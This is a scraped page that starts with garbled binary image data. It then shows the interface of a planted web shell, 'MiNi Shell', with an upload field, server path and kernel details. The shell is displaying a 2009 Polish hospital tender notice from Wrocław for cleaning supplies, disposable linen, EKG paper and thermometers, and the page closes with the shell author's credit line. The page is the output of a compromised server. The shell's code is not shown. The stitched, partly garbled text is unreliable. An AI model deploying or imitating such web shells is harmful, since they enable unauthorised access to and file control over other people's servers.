JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/139752-N-2009.html

<p class="kh_header"><b>Wrocław: DOSTAWĘ ŚRODKÓW CZYSTOŚCI, WORKÓW FOLIOWYCH, BIELIZNY JEDNORAZOWEJ, PAPIERU REJESTRACYJNEGO DO APARATÓW EKG, ŻELU do USG, TERMOMETRÓW BEZDOTYKOWYCH DLA OSK WE WROCŁAWIU</b><br>
<b>Numer ogłoszenia: 139752 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowy Szpital Kolejowy Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Wiśniowa 36, 53-137 Wrocław, woj. dolnośląskie, tel. 071 3602181, faks 071 3732569.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osk.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWĘ ŚRODKÓW CZYSTOŚCI, WORKÓW FOLIOWYCH, BIELIZNY JEDNORAZOWEJ, PAPIERU REJESTRACYJNEGO DO APARATÓW EKG, ŻELU do USG, TERMOMETRÓW BEZDOTYKOWYCH DLA OSK WE WROCŁAWIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowaniu prowadzonym w trybie przetargu nieograniczonego na podstawie ustawy PZP o wartości szacunkowej: poniżej progów ustalonych na podstawie art.11 ust.8 zgodnie z wymogami określonymi w niniejszej SIWZ.
1.Przedmiotem zamówienia jest dostawa profesjonalnych środków do utrzymania czystości w szpitalu, ręczników papierowych, mydła, proszków, ścierek, rękawic gospodarczych, worków foliowych na odpady medyczne, jednorazowej bielizny szpitalnej niesterylnej, papieru rejestracyjnego do aparatów ekg, żelu do USG, termometrów bezdotykowych dla OSK we Wrocławiu w asortymencie i ilościach określonych szczegółowo na załączonych formularzach cenowych.
2.Zamówienie podzielono na 9 pakietów. Zamawiający dopuszcza składanie ofert częściowych na poszczególne pakiety i dowolną ilość pakietów, jednak nie dopuszcza składania ofert na wybrane pozycje w pakiecie.
3.Wszystkie zaoferowane i wymienione w formularzach cenowych wyroby muszą spełniać warunki określone w formularzach cenowych oraz niniejszym rozdziale.
4.Zaoferowane wyroby muszą być dopuszczone do obrotu i używania na terenie Polski zgodnie z obowiązującymi przepisami prawa.
5.Zamawiający zastrzega sobie, że określone ilości w formularzach cenowych stanowią wielkości szacunkowe.W związku z tym, że ilość środków jest ściśle uwarunkowana z ilością hospitalizowanych pacjentów podane wyliczenia są szacunkowe, co nie zobowiązuje Zamawiającego do realizacji zamówienia w całości.
6.Zamawiający zastrzega sobie prawo niewykorzystania umowy w zakresie i wartości umownej zamówienia w sytuacjach tego wymagających tj. w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili jej zawarcia.
Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
Zamawiający dopuszcza składania ofert równoważnych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67, ust. 1, pkt.7 ustawy.
Zamawiający nie przewiduje aukcji elektronicznej.
Zamawiający, zgodnie z zapisem art. 36, ust.4, ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.76.30.00-6, 39.83.16.00-2, 39.83.21.00-4, 39.83.10.00-6, 18.42.43.00-0, 39.51.42.00-0, 39.56.00.00-5, 18.93.00.00-7, 19.52.00.00-7, 30.19.76.41-1, 33.14.00.00-0, 39.51.80.00-0, 38.41.30.33-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu o udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy: posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  oraz nie podlegają wykluczeniu z postępowania, co oznacza że:
1)podmiot został zarejestrowany we właściwym rejestrze lub ewidencji działalności gospodarczej;
2)nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania, decyzją właściwego organu;
3)nie zachodzą przesłanki wykluczenia określone w art. 24 ustawy;
4)posiadają niezbędną wiedzą i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
5)znajdują się w sytuacji ekonomicznej i  finansowej zapewniającej wykonanie zamówienia.
2.Złożą ofertę, której treść odpowiada treści niniejszej SIWZ.
3.Wyrażają zgodę na wszystkie warunki określone w SIWZ łącznie ze wzorem umowy.
4.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy przedstawionych przez wykonawcę oświadczeń i dokumentów według formuły spełnia / nie spełnia (druk ZP-17)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wyznaczył następujące wymagania, które Wykonawca spełni przedstawiając właściwie sporządzoną ofertę, oraz załączy do oferty niżej wymienione dokumenty oraz oświadczenia:

1.Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy PZP (art.22 ust.1 i pkt.4 ustawy)

Za spełnienie tego wymogu Zamawiający uzna: 

1)Aktualny dokument określający status prawny Wykonawcy tzn. odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2)Aktualne Oświadczenie Wykonawcy potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)Wykonawca spełnia warunki określone w art. 22 ust.1 Ustawy PZP oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Ustawy PZP

Za spełnienie tego wymogu Zamawiający uzna
1) Oświadczenie stanowiące załącznik Nr 3 do SIWZ.

2.Wykonawca musi posiadać niezbędną wiedzę i doświadczenie, oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust.1 pkt.2 ustawy PZP).

Za spełnienie wymogu Zamawiający uzna:
Wykaz wykonanych, a ze względu na charakter niniejszego zamówienia również wykonywanych dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości brutto, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że  dostawy te zostały wykonane należycie (minimum 2dostawy) - dokumenty te będą stanowić kolejne załączniki do oferty, wzór załącznik Nr 4 do SIWZ.

3.Zdolność ekonomiczna i finansowa - Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust.1 pkt.3).
Za spełnienie wymogu Zamawiający uzna:

1)Polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności (bez wyłączeń jakichkolwiek ryzyk dotyczących przedmiotu zamówienia) - aktualne przez okres związania umową lub przez okres związania ofertą.
4.Wymogi dotyczące przedmiotu zamówienia. W celu potwierdzenia ważności oferty i spełnienia wymaganych warunków, Wykonawca załączy do oferty następujące dokumenty i oświadczenia według poniższych zasad:
Za spełnienie wymogu Zamawiający uzna:

1.Oświadczenie o posiadaniu przez Wykonawcę na oferowane towary atestu Państwowego Zakładu Higieny i wymaganych atestów oraz przedstawienie ich na każde żądanie Zamawiającego.
2.Oświadczenie, że oferowany przedmiot zamówienia w trakcie trwania umowy będzie posiadał aktualne dopuszczenie do obrotu oraz zobowiązanie, że ww. dokumenty dopuszczające do obrotu dostarczy przy pierwszej dostawie po wygaśnięciu ważności dokumentów dopuszczających do obrotu złożonych w ofercie.

Inne wymogi:
1)Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień wymagane jest, jeżeli osoba podpisującą nie jest osoba upoważniona na podstawie wypisu z KRS lub zaświadczenia o prowadzeniu działalności gospodarczej. Pełnomocnictwo winno wskazywać datę jego wystawienia oraz okres, na który zostało udzielone.
2)W przypadku spółki cywilnej konieczne jest dołączenie umowy spółki.
3)Oferent wraz z ofertą dostarczy próbki na wskazane towary w formularzach cenowych w celu zweryfikowania zgodności oferowanych wyrobów z opisem przedmiotu zamówienia przez Zamawiającego.

Druki na których należy złożyć ofertę.

1.Wypełniony i podpisany formularz ofertowy zgodnie z załączonym wzorem stanowiącym Załącznik Nr 1 SIWZ oraz dołączony do niej formularz asortymentowo-cenowy - Załącznik Nr 2  do niniejszej SIWZ;
2.Oświadczenie Wykonawcy o spełnieniu warunków zgodnie z wymogami art. 22 ust. 1 oraz art. 24 ust.1 Ustawy PZP sporządzone według wzoru stanowiącego Załącznik Nr 3 do niniejszej SIWZ;
3.Wykaz co najmniej dwóch wykonanych / wykonywanych dostaw - Załącznik Nr 4 do niniejszej SIWZ;
4.Oświadczenie Wykonawcy o nie zaleganiu z opłatami, podatkami, składkami - załącznik Nr 5 do niniejszej SIWZ;
5.Projekt umowy z wykorzystaniem wzoru - załącznik Nr 6 do niniejszej SIWZ;
6.Do oferty należy załączyć dodatkowe dokumenty wymagane przez Zamawiającego, wyszczególnione w niniejszej SIWZ oraz spis treści.

WYKONAWCA ZAMIESZKAŁY POZA TERYTORIUM RZECZYPOSPOLITEJ POLSKIEJ
1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości (zamiast dokumentu wymienionego w rozdz. V pkt.1 ppkt.1) wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (zamiast dokumentów wymienionych w rozdz. V pkt.3  ppkt.1) - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów o których mowa wyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (daty wystawienia zgodne z wymaganiami do tych punktów).

OFERTY WSPÓLNE:
1.Zgodnie z przepisem art. 23 Ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane dokumenty - składa każdy z Wykonawców oddzielnie.
3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4.W przypadku wygrania przetargu, przed podpisaniem umowy w sprawie zamówienia publicznego, Wykonawcy składający ofertę wspólną, będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą współpracę tych Wykonawców.

Dokumenty wymienione powyżej należy traktować jako obligatoryjne.
Brak któregokolwiek z dokumentów, dostarczenie nieaktualnego dokumentu lub dostarczenie dokumentu nie odpowiadającego wymaganiom zamawiającego określonym w specyfikacji spowoduje odrzucenie oferty lub skutkować będzie wykluczeniem wykonawcy z postępowania /podstawa prawna art. 24 ust. 1 pkt.10 ustawy, z zastrzeżeniem art. 26 ust. 3 art. 89 ust.1 pkt.2 Ustawy Prawo Zamówień Publicznych/..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.osk.wroc.pl;.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Osobiście w Dziale Zamówień Publicznych w pokoju 202 II piętro Budynek C Okręgowego Szpitala Kolejowego we Wrocławiu al. Wiśniowa 36 lub na pisemny wniosek drogą pocztową..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Siedziba Zamawiającego Kancelaria Okręgowego Szpitala Kolejowego we Wrocławiu przy al. Wiśniowej 36, budynek C, I piętro, pokój 110..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PROFESJONALNE ŚRODKI DO UTRZYMANIA CZYSTOŚCI W SZPITALU, RĘCZNIKI, MYDŁO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.19.00-6, 33.76.30.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Załacznik Nr 2 Pakiet Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚRODKI CZYSTOŚCI, MYDŁO, PROSZKI, RĘKAWICE GOSPODARCZE.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.16.00-2, 39.83.21.00-4, 39.83.10.00-6, 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ściereczki z mikrofazy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.42.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Załącznik Nr2 Pakiet Nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nakładki bawełniane na mopy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worki na odpady komunalne i medyczne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochraniacze medyczne na obuwie, prześcieradła foliowe, fartuchy foliowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAPIER REJESTRACYJNY DO APARATÓW EKG; ELEKTRODY EKG; ŻEL DO USG;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.41-1, 33.14.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JEDNORAZOWA BIELIZNA SZPITALNA NIESTERYLNA.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Załącznik Nr 2 Pakiet Nr 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termometr bezdotykowy na podczerwień do mierzenia temperatury ciała u dzieci i dorosłych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.30.33-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com